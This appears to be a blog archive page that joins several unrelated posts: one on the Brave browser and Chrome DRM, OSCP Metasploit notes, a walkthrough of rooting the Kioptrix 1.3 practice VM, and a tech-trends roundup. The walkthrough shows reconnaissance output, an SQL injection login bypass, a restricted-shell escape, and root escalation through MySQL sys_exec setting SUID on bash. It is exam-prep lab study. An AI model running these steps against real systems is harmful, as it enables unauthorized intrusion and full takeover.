Last night I saw a respected security professional I follow on Twitter mention the Brave web browser, and how good he thought the mobile version is. Brave was started by the Mozilla Project co-founder Brandon Eich, and is based on Chromium, the open-source base that Google Chrome is constructed upon.
Today, I caught wind that Chrome is soon going to prevent you from doing things such as disabling its DRM management feature called Widevine. The problem with this is summarized here:
…a single browser may now require two different DRM plugins to play all DRM content. These plugins have their own security issues, but unlike with the Flash vulnerabilities, security researchers are banned from looking for them, due to Section 1201 of the Digital Millennium Copyright Act (DMCA). That means malicious hackers, who already engage in other criminal activities, may freely take advantage of all the vulnerabilities they find in these DRM plugins before companies discover them on their own.
In short, because of the closed nature of the DMCA, we end users are at risk unnecessarily, and we will soon have no ability to disable this plugin should we wish to do so. I started to look around for better options regarding browser privacy, just to see what the latest developments were.
Enter The Brave
Brave offers a browser that works on all platforms (Windows, Mac, Linux) and on mobile. It blocks ads by default, blocks malware, and is lean and fast. Putting user privacy and security at the forefront, along with speed, this thing is a powerhouse as it forces https on websites and prevents malware-serving advertisement networks from invading your workspace.
But the difference is the paradigm shift in supporting advertisers, as opposed to simply blocking them out completely:
Brave intends to keep 15% of ad revenue for itself, pay content publishers 55%, ad partners 15% and also give 15% to the browser users, who can in turn donate to bloggers and other providers of web content through micropayments.
I have yet to figure out how or if that will work, exactly, and it doesn’t seem to be fully impemented in the browser yet, but it seems like a great way to solve the elephant-in-the-room problem the Internet faces today: how to earn money and keep users safe at the same time, so that they don’t need to run ad blockers and anti-tracking plugins?
Stay tuned for more info as I learn it, and as I figure out Brave.
These are some notes I find myself referring back to as I work through my studies for the OSCP exam. As I develop more of these, I’ll continue to post them here on my blog so that others might find them useful.
Use Kali Linux for all the following instructions.
Prep: Ensure postgresql is running.
$> /etc/init.d/postgresql start
Set postgres to start on boot so you don’t have to worry about it again:
$> sudo update-rc.d postgresql enable
From the command line, fire up the Metasploit console:
Search for exploits related to what you are interested in:
In my efforts to self-study in preparation for the OSCP certification later this year, I’ve been going through some of the intentionally vulnerable Virtual Machines (VMs) on vulnhub.com to sharpen and broaden my penetration testing and hacking skills. Among others I’ve completed, the Kioptrix series of VMs is allegedly similar to what you see in the actual OSCP test, so I’ve been going through them in order.
Part of completing the OSCP is providing a write-up of your hacking adventures to explain how and what you did to hack a server, so I figured I better start now. Other folks do similar write-ups on the VMs on vulnub.com, and I’ll see if they will add this to Kioptrix 1.3 page soon.
Hopefully, someone will find this useful either way.
It should be noted that this VM was known to have at least two possible paths to getting root on the system, and this writeup outline just one.
On my local network, this VM turned up with the IP address of 192.168.0.110.
Running an nmap scan revealed some open ports and running services:
[email protected]:~# nmap -v -sS -A -T4
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Checking things out by hand based on the nmap scan results, I found there was a login page running on port 80 at http://192.168.0.110
No basic SQL injection working from any initial attempts.
Nothing in the source code of note. Some other basic manual fuzzing and poking around didn’t reveal much either.
Nikto turned up some basic stuff about Apache that I thought might be worth looking into later:
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
dirb and dirsearch
A basic dirb scan turned up a directory: http://192.168.0.110/john/
I though that could be a username. Running dirb with a bigger wordlist (big.txt in Kali) turned up another one: http://192.168.0.110/robert/
Both of those directories contained a file (robert.php and john.php) that, when clicked, would just redirect you back to the main login page.
I also ran DIRSEARCH, a python tool that also works well for finding directories and files. found file: database.sql
(Note: Dirsearch is not included in Kali by default. Requires you to setup Python 3 in a virtual environment to run it.)
Since ports 139 and 445 were being used, I went on try enum4linux
[email protected]:~# enum4linux -a 192.168.0.110
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Feb 9 00:40:35 2017
(Pasting only the relevant stuff here.)
| Enumerating Workgroup/Domain on 192.168.0.110 |
[+] Got domain/workgroup name: WORKGROUP
| Nbtstat Information for 192.168.0.110 |
Looking up status of 192.168.0.110
KIOPTRIX4 <00> - B <ACTIVE> Workstation Service
KIOPTRIX4 <03> - B <ACTIVE> Messenger Service
KIOPTRIX4 <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
MAC Address = 00-00-00-00-00-00
| Users on 192.168.0.110 |
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody Name: nobody Desc: (null)
index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert Name: ,,, Desc: (null)
index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root Name: root Desc: (null)
index: 0x4 RID: 0xbba acb: 0x00000010 Account: john Name: ,,, Desc: (null)
index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret Name: loneferret,,, Desc: (null)
| Share Enumeration on 192.168.0.110 |
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Kioptrix4 server (Samba, Ubuntu))
KIOPTRIX4 Kioptrix4 server (Samba, Ubuntu)
[+] Attempting to map shares on 192.168.0.110
//192.168.0.110/print$ Mapping: DENIED, Listing: N/A
//192.168.0.110/IPC$ [E] Can't understand response:
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
NT_STATUS_NETWORK_ACCESS_DENIED listing \*
| Password Policy Information for 192.168.0.110 |
[E] Unexpected error from polenum:
Traceback (most recent call last):
File "/usr/bin/polenum", line 33, in <module>
from impacket.dcerpc import dcerpc_v4, dcerpc, transport, samr
ImportError: cannot import name dcerpc_v4
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 0
S-1-22-1-1000 Unix User\loneferret (Local User)
S-1-22-1-1001 Unix User\john (Local User)
S-1-22-1-1002 Unix User\robert (Local User)
enum4linux complete on Thu Feb 9 00:40:51 2017
I ran acccheck on the ‘robert’ user with the big.txt pw list, to no avail. Can circle back to try the other usernames if needed.
You can use Hydra to brute force FTP, SSH, POP3, and SMTP account. Let’s try Hydra with those usernames to find SSH accounts! Trying the usernames found via acccheck with SSH logins:
This was found during discover with dirsearch, and it appears to be a short MySQL dump file. Since other avenues were turning out to be fruitless, I thought I’d give this a closer look.
Immediately, the first thing to note is that there’s a username and password shown in the dump file.
Let’s try it on the HTML login form at http://192.168.0.110/index.php?. No luck! I thought maybe that was a default password, so I tested it on the other known users as well (robert, root, loneferret), but still no luck.
Perhaps it’d work with SSH or SMB? Negatory
The file at least led me to believe MySQL was in place, so perhaps some more SQLi exploration would help.
After a number of failed attempts and errors by trying various SQL injection strings, using this worked:
Password: ' OR 1=1 #
That took me to the User Admin Panel and showed the actual password.
That seemed kinda easy. But this is when things got hard, actually.
I logged out and confirmed that the password worked. It logged me back into that same page. But what good is that? Let’s try SSH again!
Shell obtained. However, the shell seemed to be extremely limited. As instructed at login, typing ? or ‘help’ gets you a list of allowed commands:
I was warned about trying to cd into the root directory, and getting kicked out if I tried again.
lpath is the same as pwd.
The only available command that looks somewhat useful is echo. Let’s see if we can echo the contents of .profile
Uh oh. It really did kick me out! Luckily, all I had to do was reconnect via SSH. Let’s try a different file:
Bummer. How about getting around now that we know it is possible to simply re-log via SSH if you get kicked out? No luck.
Must break out of the restricted “LigGoat” shell. To the Google!
Trying a number of things, I finally found the right trick, which is to use Python to switch shells:
That was weird, but it worked, and I got a less restricted shell. This website was of much help to find the specific command needed: http://netsec.ws/?p=337
Finally, a useful shell. Well, more useful. It still seems to be a basic user account with no real privileges. So where to next? MySQL exists and can be leveraged to take over a box under the right circumstances, so before exploring other vectors, I decided to start with it.
Revisiting the web directory and the application running on the website, I found a handy SQL statement in checklogin.php. This statement had the mysql connection string, including the username and password, which were simply:
user: root pass: (empty)
That suggested the root password was never changed when MySQL was installed, so this was probably a default installation with few tweaks or security enhancements. Sure enough, I was able to log in:
Things got off track for a while here, as I wasn’t really sure what to do from this point. However, this Google search helped me:
“We may have MySQL root access but not system root access for a number of reasons including having a shell account on the target whilst MySQL’s root user has been left unpassworded by default, or alternatively gaining access via SQL injection through a web application connecting to the database as root, which is something I see far too often.”
The necessary lib file was already at /usr/lib/lib_mysqludf_sys.so which meant I didn’t need to grab it from sqlmap and upload it to the system.
Modifying those instructions a little, there was no need to compile a c script (which I was unable to do as user ‘john’ anyway.
It described the situation perfectly:
"We may have MySQL root access but not system root access for a number of reasons including having a shell account on the target whilst MySQL’s root user has been left unpassworded by default, or alternatively gaining access via SQL injection through a web application connecting to the database as root, which is something I see far too often."
The necessary lib file was already at /usr/lib/lib_mysqludf_sys.so which meant I didn't need to grab it from sqlmap and upload it to the system.
Modifying those instructions a little, there was no need to compile a c script that changes users.
Instead of this line:
select sys_exec('id > /tmp/out; chown npn.npn /tmp/out');
Just do this:
select sys_exec('chmod u+s /bin/bash');
Then drop out of MySQL and run this:
Ø bash -p
It should drop you into a root shell!
Technology is constantly evolving and innovating. This can make keeping abreast of the most current trends challenging. In a world where we are becoming more reliant than ever on technology, it’s important to be tech savvy. This is the low-down on what’s new in the world of tech, what it does, and why it matters…
Neuroscientists in France are behind this life-changing innovation. Whilst it could still be years before it’s complete, there have been promising developments. Testing has been carried out on animals. A recording device is installed beneath the skull and a pad of electrodes are put around the spinal cord. The two are joined by a wireless connection. What this achieves, in theory, is a system that translates the animals intent to move into an electrical stimulation in the spine. So brain and body are once again working in harmony.
This was starting to become a big trend last year, and it’s popularity shows no signs of slowing down. Voice search technology allows the user to speak to their phones and instantly receive answers to questions, schedule dates in diaries, and even turn the heating off at home. This technology is set to be introduced to more areas of our lives than ever before. Forget asking your phone the weather, it could be useful in our homes and workplaces too.
Virtual reality technology was big news last year and continues to be this year. VR can come in the form of headsets for gaming, immersing you in a virtual world. The latest in VR tech is virtual reality retail, a new three-dimensional environment for users to explore.
Artificial intelligence is always big news and 2017 is no different. This year we can expect to seem some impressive leaps forward as investment into this kind of tech rises. Autonomous machines are the big new development, vehicles which drive themselves. Businesses will start using machine intelligence to gain insights into better services for customers.
Solar panels were the tech of choice for eco-conscious consumers. Years after they were first released, these panels still aren’t up to the job. A new solar device promises to succeed where solar panels failed. Scientists are working on a new kind of solar energy device. It will work by transforming heat into beams of light. In theory, this will be cheaper than solar panels and harness far more of the sun’s energy. Turning sunlight into heat and then back into light, is the general idea. This could increase efficiency and provide cheap and continuous energy.